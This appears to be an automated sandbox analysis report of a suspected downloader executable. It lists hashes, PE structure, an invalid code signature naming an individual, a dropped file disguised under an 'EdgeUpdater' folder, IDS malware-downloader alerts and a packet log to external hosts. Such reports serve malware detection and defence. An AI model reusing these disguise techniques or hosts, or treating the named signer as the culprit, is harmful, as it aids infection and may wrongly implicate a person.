Preview:	L..................F....".....X:3....E.O3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.063657397171467
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	243'888 bytes
MD5:	f37e0267c53ae8e94fe38e87524b8c45
SHA1:	facaa93a619ab87da8ac448dd1fc71fb72e5380e
SHA256:	3ecf0a5fdc66d37c9e726334a0e57d6dc1e3ab622653d032f8db827185cc7c80
SHA512:	9684c9d8b8c6995f889be8e8a72e8340d12b32e85327c5b70892191f4510b32f374fc408aed1e37022326af43f620d187abfbc93f8f218488c65c3dd732ddb74
SSDEEP:	3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
TLSH:	2B34AF5A6ED8ADC6CF88E3F8E1C502A4B7F0A601B94BE3D7251A56F41EC27D50E2510F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4130c4
Entrypoint Section:	."Rv
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD12A4096 [Fri Mar 14 19:46:30 2081 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/03/2021 01:00:00 22/03/2024 00:59:59
Subject Chain	CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
Version:	3
Thumbprint MD5:	394B591BC2CE78B7CF207BF4082E62F4
Thumbprint SHA-1:	ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
Thumbprint SHA-256:	AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
Serial:	00F6AD45188E5566AA317BE23B4B8B2C2F

Entrypoint Preview

Instruction
jmp dword ptr [00408000h]
sbb dword ptr [ebx], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc944	0x28	."Rv
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x35c00	0x5cb0	."Rv
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x42000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x319f0	0x38	."Rv
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x8	.wyi
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x31a30	0x48	."Rv
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x54c8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.wyi	0x8000	0x8	0x200	9bf113b5749ae48ee7c116da37df5b27	False	0.029296875	ISO-8859 text, with no line terminators	0.04078075625387197	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
."Rv	0xa000	0x34cf0	0x34e00	8b0b5300c49214c07b4c1e6e22a50d5e	False	0.6913185209810875	data	7.004647399293236	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x40000	0x5a4	0x600	823c25fc832c6b9e2b329d77f19ff979	False	0.4186197916666667	data	4.067929421282105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x42000	0xc	0x200	4a9ae3fc69987bdb54333dac45060f05	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x40090	0x314	data			0.4352791878172589
RT_MANIFEST	0x403b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T03:26:15.106582+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:26:47.122039+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:26:48.278282+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:27:20.653255+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52918	104.26.12.205	80	TCP
2024-10-03T03:27:22.080885+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52918	104.26.12.205	80	TCP
2024-10-03T03:27:54.825124+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52923	104.26.12.205	80	TCP
2024-10-03T03:27:56.022740+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52925	104.26.12.205	80	TCP
2024-10-03T03:28:02.137640+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52926	104.26.12.205	80	TCP
2024-10-03T03:28:03.435784+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52928	104.26.12.205	80	TCP
2024-10-03T03:28:24.997014+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52932	104.26.12.205	80	TCP
2024-10-03T03:28:26.590789+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52934	104.26.12.205	80	TCP
2024-10-03T03:28:29.090755+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52937	104.26.12.205	80	TCP
2024-10-03T03:28:30.647857+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52939	104.26.12.205	80	TCP
2024-10-03T03:28:34.834966+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52942	104.26.12.205	80	TCP
2024-10-03T03:28:37.434515+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52944	104.26.12.205	80	TCP
2024-10-03T03:28:42.604352+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52948	104.26.12.205	80	TCP
2024-10-03T03:28:43.997048+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52950	104.26.12.205	80	TCP
2024-10-03T03:28:48.497039+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52953	104.26.12.205	80	TCP
2024-10-03T03:28:49.793905+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52955	104.26.12.205	80	TCP
2024-10-03T03:29:22.098503+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52958	104.26.12.205	80	TCP
2024-10-03T03:29:23.611617+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52960	104.26.12.205	80	TCP
2024-10-03T03:29:55.934540+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52964	104.26.12.205	80	TCP
2024-10-03T03:29:57.044562+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52966	104.26.12.205	80	TCP
2024-10-03T03:29:58.796662+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52967	104.26.12.205	80	TCP
2024-10-03T03:30:00.325209+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52969	104.26.12.205	80	TCP
2024-10-03T03:30:09.503073+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52972	104.26.12.205	80	TCP
2024-10-03T03:30:11.138172+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:20.325250+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:21.326164+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:53.325187+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	52974	104.26.12.205	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 03:26:13.135420084 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:13.140444994 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:13.141906023 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:13.177228928 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:13.182301998 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:13.622821093 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:13.659804106 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:13.659864902 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:13.659923077 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:13.668855906 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:13.669996023 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:13.670013905 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.335912943 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.335993052 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.338884115 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.338893890 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.339417934 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.386739016 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.427401066 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.488739014 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.491853952 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.491864920 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.937761068 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.937947035 CEST	443	49716	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:14.938007116 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.943413019 CEST	49716	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:14.953176022 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:14.958332062 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:15.060959101 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:15.062750101 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.062849998 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:15.062932014 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.063538074 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.063577890 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:15.106581926 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:15.548330069 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:15.590863943 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.616992950 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.617006063 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:15.716088057 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:15.716454029 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:15.716500044 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.004910946 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.005019903 CEST	443	49717	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.005131006 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.005763054 CEST	49717	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.009073973 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.009135962 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.009234905 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.009593964 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.009629011 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.468996048 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.471159935 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.471189976 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.593235970 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.593612909 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.593674898 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.940105915 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.940211058 CEST	443	49718	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:16.940315962 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:16.940826893 CEST	49718	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:46.951035023 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:46.956463099 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:47.076143980 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:47.078279018 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:47.078339100 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:47.078618050 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:47.078762054 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:47.078794956 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:47.122039080 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:47.605791092 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:47.617801905 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:47.617834091 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:47.739032030 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:47.739453077 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:47.739495993 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.117486954 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.117595911 CEST	443	49729	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.117855072 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.118015051 CEST	49729	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.118313074 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:48.123119116 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:48.225191116 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:26:48.225922108 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.225970984 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.226033926 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.226341963 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.226378918 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.278281927 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:26:48.694607973 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.696784973 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.696814060 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.814033985 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:48.814448118 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:48.814492941 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.101541042 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.101610899 CEST	443	49730	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.101885080 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.102135897 CEST	49730	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.111358881 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.111421108 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.111515045 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.111854076 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.111879110 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.587771893 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.641290903 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.696669102 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.696681976 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.794975042 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:49.796072960 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:49.796096087 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:50.012587070 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:50.012685061 CEST	443	49731	104.21.54.163	192.168.2.6
Oct 3, 2024 03:26:50.012731075 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:26:50.013921976 CEST	49731	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:20.028289080 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:27:20.065623999 CEST	80	49715	172.67.74.152	192.168.2.6
Oct 3, 2024 03:27:20.065788984 CEST	49715	80	192.168.2.6	172.67.74.152
Oct 3, 2024 03:27:20.068864107 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:20.077306986 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:20.077374935 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:20.077756882 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:20.083745003 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:20.607021093 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:20.611409903 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:20.611433983 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:20.611790895 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:20.611790895 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:20.611815929 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:20.653254986 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:21.200252056 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.202212095 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:21.202227116 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.563870907 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.564141989 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:21.564157963 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.904748917 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.904853106 CEST	443	52919	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:21.904908895 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:21.905266047 CEST	52919	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:21.905555010 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:21.924032927 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:22.023324966 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:22.034315109 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:22.034367085 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:22.034440041 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:22.034768105 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:22.034784079 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:22.080884933 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:22.563035011 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:22.565939903 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:22.565967083 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:22.733017921 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:22.737054110 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:22.737076998 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.193085909 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.193167925 CEST	443	52920	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.193238974 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.193680048 CEST	52920	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.194664955 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.194698095 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.194755077 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.195080996 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.195099115 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.794785976 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.796536922 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.796565056 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.936882019 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:23.937205076 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:23.937243938 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:24.255467892 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:24.255563974 CEST	443	52921	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:24.255625963 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:24.256181955 CEST	52921	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:54.254796028 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:54.255723000 CEST	52923	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:54.259943008 CEST	80	52918	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:54.259993076 CEST	52918	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:54.260535002 CEST	80	52923	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:54.260627031 CEST	52923	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:54.260922909 CEST	52923	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:54.265758038 CEST	80	52923	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:54.723021984 CEST	80	52923	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:54.724180937 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:54.724229097 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:54.724672079 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:54.724920034 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:54.724941015 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:54.825124025 CEST	52923	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:55.184154034 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.186156988 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:55.186171055 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.298472881 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.298791885 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:55.298821926 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.725784063 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.725861073 CEST	443	52924	104.21.54.163	192.168.2.6
Oct 3, 2024 03:27:55.725958109 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:55.726397991 CEST	52924	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:27:55.726968050 CEST	52923	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:55.728151083 CEST	52925	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:55.732269049 CEST	80	52923	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:55.733006954 CEST	52923	80	192.168.2.6	104.26.12.205
